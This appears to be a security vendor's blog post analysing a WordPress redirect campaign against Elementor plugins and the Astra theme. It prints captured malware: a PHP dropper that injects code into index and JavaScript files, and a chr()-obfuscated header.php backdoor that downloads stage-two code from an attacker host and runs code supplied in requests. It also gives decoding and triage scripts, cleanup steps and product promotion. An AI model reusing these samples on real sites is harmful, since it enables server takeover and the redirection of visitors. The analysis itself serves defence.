Attacks targeting vulnerabilities in WordPress themes and plugins have only intensified in the past few months. The ongoing attack campaign against WordPress plugins and themes (Elementor Pro, Ultimate Addons for Elementor and the Astra theme) seems to have taken a new turn, with redirection hack campaigns surfacing that send visitors to questionable websites such as:
- digestcolect [.] com,
- js[.]donatelloflowfirstly.ga,
- track[.]developfirstline[.]com/t.js?s=5,
- deliverynotforme[.]best,
- 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83,
- 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3,
- well.linetoadsactive[.]com/m.js?n=nb5,
- 0.realhelpcompany[.]ga,
- fast.helpmart[.]ga/m[.]js?w=085,
- dock.lovegreenpencils[.]ga/m.js?n=nb5,
- cht.secondaryinformtrand[.]com/m.js?n=nb5,
- main.travelfornamewalking[.]ga/,
- irc.lovegreenpencils[.]ga/, etc.
Both Elementor Pro and Ultimate Addons for Elementor have issued updates that patch these security issues, so please update to at least the following versions if you have not already:
- Elementor Pro: 2.9.4
- Ultimate Addons for Elementor: 1.24.2
Related hack: we have also seen WordPress websites loading a script from track[.]developfirstline[.]com/t.js?s=5 (injected as a <script type='text/javascript'> tag) that redirects visitors.
What We Know So Far…
One symptom common to all affected websites is redirection.
That said, other symptoms also hint at the attack:
- Files with gibberish names added to the website root directory
- Unauthorized admin users added to the WordPress admin area
- Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
- Unknown files in the website root, such as wp-xmlrpc.php and wp-cl-plugin.php
- Thousands of unknown malicious JavaScript and PHP files added to the file system
What Does Malicious ‘tap.digestcolect.com/r.php?id=0 spam/’ Website Redirection Code Look Like?
- The following code was found under a file named 'hjghjerg'. It is the dropper: it sweeps the file system and injects the redirect into index and JavaScript files. The '...' marks code elided from the sample, and the injected payload string $l2 is empty as published:
<?php
// Rate limiter: the sweep runs at most once every 6400 seconds, using ./debugs.log to store the last-run time.
$lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
    $lastRun = file_get_contents($lastRunLog);
    if (time() - $lastRun >= 6400) {
        // Start eight levels above the document root so the sweep reaches every site the web user can read.
        search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
        search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
        file_put_contents($lastRunLog, time());
    }
} else {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
    file_put_contents( './debugs.log', time());
}

// Recursive sweep for files whose name contains "index"; each hit goes to make_it().
// If the start directory cannot be read, one "../" is dropped and the walk retried until the document root is reached.
function search_file($dir,$file_to_search){
    $files = @scandir($dir);
    if($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            @search_file( $dir,"index");
            return;
        }
        if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
            @search_file( $dir,"index");
            return;
        }
    }
    ...

// Same sweep for JavaScript: every file whose name contains ".js" goes to make_it_js().
function search_file_js($dir,$file_to_search){
    $files = @scandir($dir);
    if($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            @search_file_js( $dir,".js");
            return;
        }
        if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
            @search_file_js( $dir,".js");
            return;
        }
    }
    foreach($files as $key => $value){
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
                make_it_js($path);
            }
        } else if($value != "." && $value != "..") {
            search_file_js($path, $file_to_search);
        }
    }
}

// Injects into a JavaScript file. Only files that already contain "var" are touched; the string
// "mndfhghjf" is the dropper's own marker, so an already infected file is skipped; the payload $l2
// is prepended after a chmod 777 so the write succeeds even on read-only files.
function make_it_js($f){
    $g = file_get_contents($f);
    if (strpos($g, 'var') !== false) {
        $g = file_get_contents($f);
        if (strpos($g, 'mndfhghjf') !== false) {
            // already infected: nothing to do
        } else {
            $l2 = "";
            $g = file_get_contents($f);
            $g = $l2.$g;
            @system('chmod 777 '.$f);
            @file_put_contents($f,$g);
            $g = file_get_contents($f);
            if (strpos($g, 'mndfhghjf') !== false) {
                // re-read after writing; the result is not acted on
            }
        }
    }
}

// Same injection for index files, with "trackstatisticsss" as the already-infected marker.
function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, 'trackstatisticsss') !== false) {
        // already infected: nothing to do
    } else {
        $l2 = "";
        $g = $l2.$g;
        @system('chmod 777 '.$f);
        @file_put_contents($f,$g);
        $g = file_get_contents($f);
        if (strpos($g, 'trackstatisticsss') !== false) {
            // re-read after writing; the result is not acted on
        }
    }
}
- This piece of code was found inside the file header.php (reproduced as found; the ".." marks where the sample was cut):
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
@file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).
..
chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];} function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
Decoding the chr() chains, the header.php sample does the following:
- $c is "base64_decode" and $d is "file_get_contents": the first block fetches http://css.digestcolect[.]com/m.txt, base64-decodes it, writes it to a file named "h" prefixed with "<?php ", includes that file and deletes it, so the stage-two code never stays on disk.
- Two request-triggered backdoors follow. The first fires when $_REQUEST['asavsdvds'] is set and md5($_REQUEST['lgkfghdfh']) equals a hard-coded hash (cut off in the sample); it writes "<?php " followed by base64_decode($_REQUEST['d1']) to a file, includes and deletes it, then repeats the attempt under /tmp/. The second fires when md5($_GET[5]) equals 37147ec1ab66861d6e2ef8f672cb2c0b: it concatenates the cookie or POST values jweyc, aeskoly, owhggiku and callbrhy, reverses the string, hex-decodes it with pack("H*"), applies str_rot13 and runs the result through create_function(); if nothing was supplied it echoes the decoy string "local-error-not-found" (the base64 literal).
- Finally the redirect loader <script src='https://css.digestcolect.com/g.js?v=1.0.0'> is emitted, twice in this sample.
- This code was found in some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
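The chr() chains in the header.php sample above are tedious to read by hand. The following Python script, an added example rather than code from the original post, decodes them automatically. The SAMPLE string is the first five statements of that header.php snippet; the folding and variable-resolution rules are a heuristic for this obfuscation style, so literals containing quotes or backslashes, and variables reassigned later, are not handled.

```python
"""Deobfuscate the chr()-concatenation style used in the header.php sample.

Added example, not code from the original post. It folds every run of
chr(n) calls joined by '.' into one string literal, merges adjacent
literals, then resolves variables that hold a function name so that
$c($d(...)) reads as base64_decode(file_get_contents(...)).
"""
import re

# One or more chr(n) calls joined by PHP's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*")
CHR_ARG = re.compile(r"chr\(\s*(\d+)\s*\)")
# Two adjacent quote-delimited literals (no quotes or backslashes inside) joined by '.'.
ADJACENT_LITERALS = re.compile(r"""(['"])([^'"\\]*)\1\s*\.\s*(['"])([^'"\\]*)\3""")
# $var = 'identifier';  (a variable that holds a function name)
FUNC_VAR = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z_]\w*)'\s*;")


def php_quote(s: str) -> str:
    """Render s as a single-quoted PHP literal; only backslash and quote need escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def decode_chr_chain(chain: str) -> str:
    """'chr(104).chr(105)' -> 'hi'"""
    return "".join(chr(int(n)) for n in CHR_ARG.findall(chain))


def fold_literals(php: str) -> str:
    """Replace chr() chains with literals, then merge literals concatenated with '.'."""
    out = CHR_CHAIN.sub(lambda m: php_quote(decode_chr_chain(m.group(0))), php)
    while True:
        merged = ADJACENT_LITERALS.sub(lambda m: php_quote(m.group(2) + m.group(4)), out)
        if merged == out:
            return out
        out = merged


def resolve_variable_functions(php: str) -> str:
    """Where $v = 'name'; appears, rewrite calls written as $v( into name(.
    Heuristic: assumes the variable is not reassigned later in the file."""
    for var, name in FUNC_VAR.findall(php):
        php = re.sub(r"\$" + re.escape(var) + r"\s*\(", name + "(", php)
    return php


def deobfuscate(php: str) -> str:
    return resolve_variable_functions(fold_literals(php))


# Constructed input: the first five statements of the header.php snippet quoted in this post.
SAMPLE = (
    '$c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";\n'
    '$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);\n'
    '$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46)'
    '.chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116)'
    '.chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));\n'
    '$c1 = chr(104);\n'
    '@file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1);\n'
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run against SAMPLE, the script turns the first statement into `$c = 'base64_decode';` and the third into `$b = base64_decode(file_get_contents('http://css.digestcolect.com/m.txt'));`, which is enough to see the stage-two download without tracing character codes by hand.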
How to Fix the Digestcolect [.] com Redirect?
If your website is redirecting or showing other symptoms of the hack, you can speed up your incident response with the following checks:
- Start with the files attackers most often target: functions.php, wp-config.php and index.php.
- Compare the WordPress core files on your server against a clean copy of the same version to see whether core files have been modified.
- Scan your website with an online malware scanner.
- Check the database for unfamiliar administrator accounts and users.
- Check your root directory for files with gibberish names.
You can follow our WordPress redirection removal guide for more thorough malware removal or follow this step-by-step tutorial for the same.
If the redirection still persists, it is quite possible that hackers have also injected backdoors on your website. This usually requires an in-depth malware scan with code review to clean the website.
Also check out: Step-by-Step WordPress Malware Removal Guide
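The file-system part of the triage above (core-file comparison, the symptoms list, and the strings quoted from the injected code) can be scripted. The following Python is an added example, not code from the original post or from Astra; the indicator strings are taken from the code samples on this page, and the directory trees, file contents and the wp-cl-plugin.php body in build_demo() are constructed for the demonstration.

```python
"""Triage checks for the infection symptoms and clean-up steps listed above.

Added example, not code from the original post. It (1) compares a live
WordPress tree with a clean copy of the same version to list modified and
added files, (2) searches every file for the strings this post quotes from
the injected code, and (3) flags the file names and locations the post
lists as symptoms. The trees built in build_demo() are constructed input.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Content indicators taken from the injected code quoted in this post.
IOC_PATTERNS = {
    "digestcolect domain": re.compile(rb"digestcolect\.com"),
    "js marker": re.compile(rb"mndfhghjf"),              # dropper's "already infected" marker in .js files
    "index marker": re.compile(rb"trackstatisticsss"),   # same marker for index files
    "chr() chain": re.compile(rb"(?:chr\(\d+\)\s*\.\s*){8,}"),  # long chr() obfuscation runs
    "create_function": re.compile(rb"create_function\s*\("),
}
# File names the post reports, plus the dropper's own last-run log.
SUSPICIOUS_NAMES = {"wp-xmlrpc.php", "wp-cl-plugin.php", "debugs.log"}
# Extension-less lowercase names such as 'hjghjerg'.
GIBBERISH_NAME = re.compile(r"^[a-z]{6,}$")


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def files_under(root: Path) -> dict:
    """Map relative POSIX path -> Path for every regular file below root."""
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def compare_with_clean(clean_root, live_root):
    """Return (modified, added): files whose hash differs from the clean copy, and files the clean copy lacks."""
    clean = {rel: sha256(p) for rel, p in files_under(Path(clean_root)).items()}
    live = {rel: sha256(p) for rel, p in files_under(Path(live_root)).items()}
    modified = sorted(rel for rel, h in live.items() if rel in clean and clean[rel] != h)
    added = sorted(rel for rel in live if rel not in clean)
    return modified, added


def scan_for_iocs(root) -> dict:
    """Return {relative path: [reasons]} for files matching a content IOC or a suspicious name/location."""
    findings = {}
    for rel, path in files_under(Path(root)).items():
        data = path.read_bytes()
        reasons = [label for label, pat in IOC_PATTERNS.items() if pat.search(data)]
        if path.name in SUSPICIOUS_NAMES or GIBBERISH_NAME.match(path.name):
            reasons.append("suspicious file name")
        # PHP has no business under wp-content/uploads; the post reports files in uploads/elementor/custom-icons/.
        if "uploads" in rel.split("/") and path.suffix.lower() in {".php", ".phtml"}:
            reasons.append("php under uploads")
        if reasons:
            findings[rel] = reasons
    return findings


def build_demo():
    """Constructed trees: a clean install next to a live copy carrying the injections this post describes."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    for root in (clean, live):
        (root / "wp-includes" / "js").mkdir(parents=True)
        (root / "wp-content" / "uploads" / "elementor" / "custom-icons").mkdir(parents=True)
        (root / "index.php").write_text("<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n")
        (root / "wp-includes" / "js" / "jquery.js").write_text("var jQuery = {};\n")
    # Core file with the redirect loader appended.
    with (live / "index.php").open("a") as fh:
        fh.write("<script src='https://css.digestcolect.com/g.js?v=1.0.0'></script>\n")
    # JavaScript file already carrying the dropper's marker (payload itself omitted).
    (live / "wp-includes" / "js" / "jquery.js").write_text("/* mndfhghjf */\nvar jQuery = {};\n")
    # Gibberish-named dropper, its last-run log, and a chr()-obfuscated PHP file under uploads.
    (live / "hjghjerg").write_text("<?php $lastRunLog = './debugs.log';\n")
    (live / "debugs.log").write_text("1590000000")
    obfuscated = ".".join("chr(%d)" % ord(ch) for ch in "file_put_contents")
    (live / "wp-content" / "uploads" / "elementor" / "custom-icons" / "wp-cl-plugin.php").write_text(
        "<?php $f = " + obfuscated + ";\n")
    return clean, live


def run_demo() -> dict:
    clean, live = build_demo()
    modified, added = compare_with_clean(clean, live)
    return {"modified": modified, "added": added, "iocs": scan_for_iocs(live)}


if __name__ == "__main__":
    for section, result in run_demo().items():
        print(section, result)
```

On a real host, point compare_with_clean() at your document root and at a freshly downloaded copy of the same WordPress version (WP-CLI's wp core verify-checksums does the same comparison against WordPress.org checksums), then run scan_for_iocs() over the whole document root, including the parent directories the dropper climbs into on shared hosting. The database step from the list above is separate: list administrators with wp user list --role=administrator or a query on wp_users/wp_usermeta and remove any account you did not create.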
Not infected? Secure Your Website
If you dodged this exploit, don't leave it to chance: secure your website now. A premium firewall like Astra Security goes a long way in securing your website, with 24x7 monitoring and protection from attacks such as JS injection, SQLi, CSRF, XSS, bad bots, RFI, LFI and a hundred others.
With additional security tools such as a malware scanner, country blocking and IP blocking, Astra Security makes security a cakewalk for businesses and blogs alike.
Hi, can you tell me about WordPress backdoor hacks and how I can defend against this happening to me?
Hi James! A WordPress backdoor is the code which allows an attacker unauthorized and persistent access to the server. Often it is a malicious file hidden somewhere. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/
Hello, what features does the Astra firewall offer along with the scanner for WordPress security, and can you provide more info on pricing and details?
Hi Ament! Thanks for responding to the article. You can visit here for features and more information of Astra firewall: https://www.getastra.com/wordpress-firewall and for pricing visit here: https://www.getastra.com/pricing
Hi Astra, my WordPress website is showing some strange Japanese content in Google search. Is my website hacked? If yes, how can I solve it?
Thanks for responding to the article. In a Japanese keyword hack, auto generated Japanese text starts to appear on your site. This particular Blackhat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/
Hello, how can I fix the WordPress redirection hack? I have a site which is redirecting to strange websites and I want to fix it myself.
Hi Wysong! Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/
Hi there, I have a query. Is there any chance that hackers upload files using a file manager that affects website performance?
Hi Foster! Yes, malicious file uploaders allow hackers to upload .php files, etc., to the server, which could be used to further infect the site. The consequences could include complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement.
Hey, I think my database has some infected files. In which tables can I possibly find them? It's a WordPress site.
Hi Paul! Sorry to hear that. For any WordPress website, the database is the biggest asset. It stores all the crucial information of a website i.e. user info, site URLs, posts, pages, comments, custom fields, etc. An improperly secured WordPress database is like an open invitation to hackers. For more info, visit here: https://www.getastra.com/blog/911/how-to-secure-wordpress-database/
Hi there, can you tell me about those common files that have a high chance of getting hacked? I own a website running on WordPress.
Hi Catherine! Thanks for responding to the article. You can go through this article to learn more about common files that get hacked and how to protect them: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/
Hey can you tell me more about the features that Astra firewall comes with? I would like to know more before opting for it 🙂
Hi Miller! Thanks for responding to the article and also for showing interest in Astra. You don't have to worry about any malware, credit card hack, SQLi, XSS, SEO spam, comment spam, brute force and 100+ types of threats. This means you can get rid of other security plugins and let Astra take care of it all. You can find more information about features and more here: https://www.getastra.com/features